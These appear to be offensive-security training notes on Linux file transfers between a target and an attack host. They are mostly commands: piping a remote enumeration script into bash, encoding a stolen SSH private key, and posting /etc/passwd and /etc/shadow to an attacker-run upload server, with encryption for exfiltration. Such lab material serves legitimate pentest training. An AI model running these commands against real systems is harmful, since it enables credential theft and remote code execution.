Linux is a versatile operating system, which commonly has many different tools we can use to perform file transfers.

There are also situations where we must upload files from our target onto our attack host.

Base64 Clipboard Transfer

Use base64 when normal transfer tools are unavailable and terminal copy/paste is the easiest path. Verify the hash before and after.

# check file hash
md5sum id_rsa
 
# encode to b64
cat id_rsa |base64 -w 0;echo
 
# decode the file
echo -n 'LS0tLS...' | base64 -d > id_rsa
 
# confirm the hash
md5sum id_rsa

Web Downloads

Use HTTP/HTTPS downloads when outbound web traffic is allowed.

# download a file
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
 
# fileless download
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
 
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Bash TCP Download

If no well-known file transfer tools are available.

# connect to target webserver
exec 3<>/dev/tcp/10.10.10.32/80
 
# HTTP Get Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
 
# print response
cat <&3

SSH Downloads

Use SCP when SSH access is available.

# enable the SSH server
sudo systemctl enable ssh
 
# start
sudo systemctl start ssh
 
# verify the listening port
netstat -lnpt
 
# download the file from the target
scp plaintext@192.168.49.128:/root/myroot.txt .

Web Upload

Use a Python upload server when the target can initiate an HTTP upload back to the attack host.

# start upload server
sudo python3 -m pip install --user uploadserver
 
# create a self-signed certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
 
# start web server
mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate ~/server.pe
 
# Upload file from target host
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Simple Web Servers and SCP Upload

Living off the land binaries exist that allow attackers to perform actions beyond their original purpose.

# creating web servers
python3 -m http.server
php -S 0.0.0.0:8000
python2.7 -m SimpleHTTPServer
ruby -run -ehttpd . -p8000
 
# download files from the target machine
wget 192.168.49.128:8000/filetotransfer.txt
 
# SCP upload
scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/

File Encryption

As mentioned in Windows, file encryption may be necessary to exfiltrate sensitive data over the network.

OpenSSL can be used to send files “nc style” to encrypt files.

# Encrypt a file
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc
 
# Decrypting a file
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd

Nginx Upload Server

Can be used to create a secure web server for file upload operations beyond the Python3 technique seen above.

# create a directory to handle uploaded files
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
 
# change the owner www-data
sudo chown -R www-data:www-data /var/www/uploads/SecretUp
loadDirectory
 
# create the Nginx config file in /etc/nginx/sites-available/upload.conf
server {
    listen 9001;
    
    location /SecretUploadDirectory/ {
        root    /var/www/uploads;
        dav_methods PUT;
    }
} 
 
# symlink to the sites-enabled directory
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
 
# start nginx
sudo systemctl restart nginx.service
 
# verify errors
tail -2 /var/log/nginx/error.log
ss -lnpt | grep 80
ps -ef | grep 2811
 
# remove the nginxdefault config
sudo rm /etc/nginx/sites-enabled/default
 
# upload a file using curl
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt